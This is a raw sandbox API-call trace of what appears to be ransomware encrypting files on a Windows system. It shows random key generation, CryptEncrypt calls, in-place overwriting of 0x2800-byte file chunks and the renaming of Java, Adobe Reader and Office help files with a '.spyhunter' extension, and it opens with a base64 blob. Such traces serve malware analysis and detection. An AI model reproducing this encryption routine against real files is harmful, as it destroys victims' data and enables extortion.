(lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0179.316] WriteFile (in: hFile=0x9c, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x270e43c, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x270e43c*=0x2ac, lpOverlapped=0x0) returned 1 [0179.316] CloseHandle (hObject=0x9c) returned 1 [0179.316] GetProcessHeap () returned 0x2c0000 [0179.316] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e7f6d0 | out: hHeap=0x2c0000) returned 1 [0179.317] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e3d8 | out: pbBuffer=0x270e3d8) returned 1 [0179.317] GetProcessHeap () returned 0x2c0000 [0179.317] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0179.317] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x270e3d0*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x270e3d0*=0x30) returned 1 [0179.317] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1033\\hxdsui.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\help\\1033\\hxdsui.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0179.318] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1033\\hxdsui.dll") returned 77 [0179.318] StrStrW (lpFirst="hxdsui.dll", lpSrch=".txt") returned 0x0 [0179.318] GetProcessHeap () returned 0x2c0000 [0179.318] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0179.318] ReadFile (in: hFile=0x9c, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e394, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x270e394*=0x2800, lpOverlapped=0x0) returned 1 [0179.583] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0179.583] WriteFile (in: hFile=0x9c, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270e394, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x270e394*=0x2800, lpOverlapped=0x0) returned 1 [0179.583] GetProcessHeap () returned 0x2c0000 [0179.583] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0179.583] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0179.583] WriteFile (in: hFile=0x9c, lpBuffer=0x270e3d4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e394, lpOverlapped=0x0 | out: lpBuffer=0x270e3d4*, lpNumberOfBytesWritten=0x270e394*=0x4, lpOverlapped=0x0) returned 1 [0179.632] WriteFile (in: hFile=0x9c, lpBuffer=0x31f2f0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e394, lpOverlapped=0x0 | out: lpBuffer=0x31f2f0*, lpNumberOfBytesWritten=0x270e394*=0x30, lpOverlapped=0x0) returned 1 [0179.632] CloseHandle (hObject=0x9c) returned 1 [0179.632] GetProcessHeap () returned 0x2c0000 [0179.632] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0179.632] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1033\\hxdsui.dll.spyhunter") returned 87 [0179.632] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1033\\hxdsui.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\help\\1033\\hxdsui.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1033\\hxdsui.dll.spyhunter" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\help\\1033\\hxdsui.dll.spyhunter")) returned 1 [0179.633] GetProcessHeap () returned 0x2c0000 [0179.633] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0179.633] GetProcessHeap () returned 0x2c0000 [0179.634] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0179.634] GetProcessHeap () returned 0x2c0000 [0179.634] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ee7e60 | out: hHeap=0x2c0000) returned 1 [0179.634] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e3d8 | out: pbBuffer=0x270e3d8) returned 1 [0179.634] GetProcessHeap () returned 0x2c0000 [0179.634] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0179.634] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x270e3d0*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x270e3d0*=0x30) returned 1 [0179.634] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Java\\Java Update\\jucheck.exe" (normalized: "c:\\program files (x86)\\common files\\java\\java update\\jucheck.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0179.635] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Java\\Java Update\\jucheck.exe") returned 68 [0179.635] StrStrW (lpFirst="jucheck.exe", lpSrch=".txt") returned 0x0 [0179.635] GetProcessHeap () returned 0x2c0000 [0179.635] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0179.635] ReadFile (in: hFile=0x9c, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e394, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270e394*=0x2800, lpOverlapped=0x0) returned 1 [0179.637] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0179.637] WriteFile (in: hFile=0x9c, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270e394, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270e394*=0x2800, lpOverlapped=0x0) returned 1 [0179.637] GetProcessHeap () returned 0x2c0000 [0179.637] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0179.637] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0179.637] WriteFile (in: hFile=0x9c, lpBuffer=0x270e3d4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e394, lpOverlapped=0x0 | out: lpBuffer=0x270e3d4*, lpNumberOfBytesWritten=0x270e394*=0x4, lpOverlapped=0x0) returned 1 [0179.639] WriteFile (in: hFile=0x9c, lpBuffer=0x31f2f0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e394, lpOverlapped=0x0 | out: lpBuffer=0x31f2f0*, lpNumberOfBytesWritten=0x270e394*=0x30, lpOverlapped=0x0) returned 1 [0179.639] CloseHandle (hObject=0x9c) returned 1 [0179.639] GetProcessHeap () returned 0x2c0000 [0179.639] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0179.639] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Common Files\\Java\\Java Update\\jucheck.exe.spyhunter") returned 78 [0179.639] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Java\\Java Update\\jucheck.exe" (normalized: "c:\\program files (x86)\\common files\\java\\java update\\jucheck.exe"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Java\\Java Update\\jucheck.exe.spyhunter" (normalized: "c:\\program files (x86)\\common files\\java\\java update\\jucheck.exe.spyhunter")) returned 1 [0179.640] GetProcessHeap () returned 0x2c0000 [0179.640] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0179.640] GetProcessHeap () returned 0x2c0000 [0179.640] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0179.640] GetProcessHeap () returned 0x2c0000 [0179.640] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e7b388 | out: hHeap=0x2c0000) returned 1 [0179.640] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e3d0 | out: pbBuffer=0x270e3d0) returned 1 [0179.640] GetProcessHeap () returned 0x2c0000 [0179.640] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0179.640] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x270e3c8*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x270e3c8*=0x30) returned 1 [0179.641] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Java\\Java Update\\jaureg.exe" (normalized: "c:\\program files (x86)\\common files\\java\\java update\\jaureg.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0179.641] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Java\\Java Update\\jaureg.exe") returned 67 [0179.641] StrStrW (lpFirst="jaureg.exe", lpSrch=".txt") returned 0x0 [0179.641] GetProcessHeap () returned 0x2c0000 [0179.641] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0179.641] ReadFile (in: hFile=0x9c, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e38c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270e38c*=0x2800, lpOverlapped=0x0) returned 1 [0179.864] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0179.864] WriteFile (in: hFile=0x9c, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270e38c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270e38c*=0x2800, lpOverlapped=0x0) returned 1 [0179.864] GetProcessHeap () returned 0x2c0000 [0179.864] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0179.864] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0179.864] WriteFile (in: hFile=0x9c, lpBuffer=0x270e3cc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e38c, lpOverlapped=0x0 | out: lpBuffer=0x270e3cc*, lpNumberOfBytesWritten=0x270e38c*=0x4, lpOverlapped=0x0) returned 1 [0179.985] WriteFile (in: hFile=0x9c, lpBuffer=0x31f2f0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e38c, lpOverlapped=0x0 | out: lpBuffer=0x31f2f0*, lpNumberOfBytesWritten=0x270e38c*=0x30, lpOverlapped=0x0) returned 1 [0179.985] CloseHandle (hObject=0x9c) returned 1 [0180.059] GetProcessHeap () returned 0x2c0000 [0180.059] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0180.059] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Common Files\\Java\\Java Update\\jaureg.exe.spyhunter") returned 77 [0180.059] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Java\\Java Update\\jaureg.exe" (normalized: "c:\\program files (x86)\\common files\\java\\java update\\jaureg.exe"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Java\\Java Update\\jaureg.exe.spyhunter" (normalized: "c:\\program files (x86)\\common files\\java\\java update\\jaureg.exe.spyhunter")) returned 1 [0180.060] GetProcessHeap () returned 0x2c0000 [0180.060] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0180.060] GetProcessHeap () returned 0x2c0000 [0180.060] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0180.060] GetProcessHeap () returned 0x2c0000 [0180.060] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e03198 | out: hHeap=0x2c0000) returned 1 [0180.060] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e3d0 | out: pbBuffer=0x270e3d0) returned 1 [0180.060] GetProcessHeap () returned 0x2c0000 [0180.061] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0180.061] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x270e3c8*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x270e3c8*=0x30) returned 1 [0180.061] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\win\\CP1254.TXT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\win\\cp1254.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0180.062] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\win\\CP1254.TXT") returned 97 [0180.062] StrStrW (lpFirst="CP1254.TXT", lpSrch=".txt") returned 0x0 [0180.062] GetProcessHeap () returned 0x2c0000 [0180.062] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0180.062] ReadFile (in: hFile=0x9c, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e38c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x270e38c*=0x25ac, lpOverlapped=0x0) returned 1 [0180.088] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffda54, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0180.088] WriteFile (in: hFile=0x9c, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x25ac, lpNumberOfBytesWritten=0x270e38c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x270e38c*=0x25ac, lpOverlapped=0x0) returned 1 [0180.088] GetProcessHeap () returned 0x2c0000 [0180.088] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0180.088] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0180.088] WriteFile (in: hFile=0x9c, lpBuffer=0x270e3cc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e38c, lpOverlapped=0x0 | out: lpBuffer=0x270e3cc*, lpNumberOfBytesWritten=0x270e38c*=0x4, lpOverlapped=0x0) returned 1 [0180.088] WriteFile (in: hFile=0x9c, lpBuffer=0x31f2f0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e38c, lpOverlapped=0x0 | out: lpBuffer=0x31f2f0*, lpNumberOfBytesWritten=0x270e38c*=0x30, lpOverlapped=0x0) returned 1 [0180.088] CloseHandle (hObject=0x9c) returned 1 [0180.088] GetProcessHeap () returned 0x2c0000 [0180.088] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0180.088] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\win\\CP1254.TXT.spyhunter") returned 107 [0180.088] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\win\\CP1254.TXT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\win\\cp1254.txt"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\win\\CP1254.TXT.spyhunter" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\win\\cp1254.txt.spyhunter")) returned 1 [0180.090] GetProcessHeap () returned 0x2c0000 [0180.090] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0180.090] GetProcessHeap () returned 0x2c0000 [0180.090] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0180.090] GetProcessHeap () returned 0x2c0000 [0180.090] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ee3270 | out: hHeap=0x2c0000) returned 1 [0180.090] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e3c8 | out: pbBuffer=0x270e3c8) returned 1 [0180.090] GetProcessHeap () returned 0x2c0000 [0180.090] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0180.090] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x270e3c0*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x270e3c0*=0x30) returned 1 [0180.090] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\win\\CP1251.TXT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\win\\cp1251.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0180.091] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\win\\CP1251.TXT") returned 97 [0180.091] StrStrW (lpFirst="CP1251.TXT", lpSrch=".txt") returned 0x0 [0180.091] GetProcessHeap () returned 0x2c0000 [0180.091] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0180.091] ReadFile (in: hFile=0x9c, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e384, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x270e384*=0x251f, lpOverlapped=0x0) returned 1 [0180.180] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffdae1, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0180.180] WriteFile (in: hFile=0x9c, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x251f, lpNumberOfBytesWritten=0x270e384, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x270e384*=0x251f, lpOverlapped=0x0) returned 1 [0180.180] GetProcessHeap () returned 0x2c0000 [0180.181] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0180.181] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0180.181] WriteFile (in: hFile=0x9c, lpBuffer=0x270e3c4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e384, lpOverlapped=0x0 | out: lpBuffer=0x270e3c4*, lpNumberOfBytesWritten=0x270e384*=0x4, lpOverlapped=0x0) returned 1 [0180.181] WriteFile (in: hFile=0x9c, lpBuffer=0x31f2f0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e384, lpOverlapped=0x0 | out: lpBuffer=0x31f2f0*, lpNumberOfBytesWritten=0x270e384*=0x30, lpOverlapped=0x0) returned 1 [0180.181] CloseHandle (hObject=0x9c) returned 1 [0180.181] GetProcessHeap () returned 0x2c0000 [0180.181] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0180.181] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\win\\CP1251.TXT.spyhunter") returned 107 [0180.181] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\win\\CP1251.TXT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\win\\cp1251.txt"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\win\\CP1251.TXT.spyhunter" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\win\\cp1251.txt.spyhunter")) returned 1 [0180.182] GetProcessHeap () returned 0x2c0000 [0180.182] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0180.182] GetProcessHeap () returned 0x2c0000 [0180.182] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0180.182] GetProcessHeap () returned 0x2c0000 [0180.182] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ee1900 | out: hHeap=0x2c0000) returned 1 [0180.182] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e3c8 | out: pbBuffer=0x270e3c8) returned 1 [0180.182] GetProcessHeap () returned 0x2c0000 [0180.182] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0180.182] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x270e3c0*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x270e3c0*=0x30) returned 1 [0180.182] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\ICELAND.TXT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\mac\\iceland.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0180.183] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\ICELAND.TXT") returned 98 [0180.183] StrStrW (lpFirst="ICELAND.TXT", lpSrch=".txt") returned 0x0 [0180.183] GetProcessHeap () returned 0x2c0000 [0180.183] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0180.183] ReadFile (in: hFile=0x9c, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e384, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x270e384*=0x2800, lpOverlapped=0x0) returned 1 [0180.184] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0180.184] WriteFile (in: hFile=0x9c, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270e384, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x270e384*=0x2800, lpOverlapped=0x0) returned 1 [0180.184] GetProcessHeap () returned 0x2c0000 [0180.184] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0180.184] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0180.184] WriteFile (in: hFile=0x9c, lpBuffer=0x270e3c4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e384, lpOverlapped=0x0 | out: lpBuffer=0x270e3c4*, lpNumberOfBytesWritten=0x270e384*=0x4, lpOverlapped=0x0) returned 1 [0180.185] WriteFile (in: hFile=0x9c, lpBuffer=0x31f2f0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e384, lpOverlapped=0x0 | out: lpBuffer=0x31f2f0*, lpNumberOfBytesWritten=0x270e384*=0x30, lpOverlapped=0x0) returned 1 [0180.185] CloseHandle (hObject=0x9c) returned 1 [0180.185] GetProcessHeap () returned 0x2c0000 [0180.185] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0180.185] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\ICELAND.TXT.spyhunter") returned 108 [0180.185] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\ICELAND.TXT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\mac\\iceland.txt"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 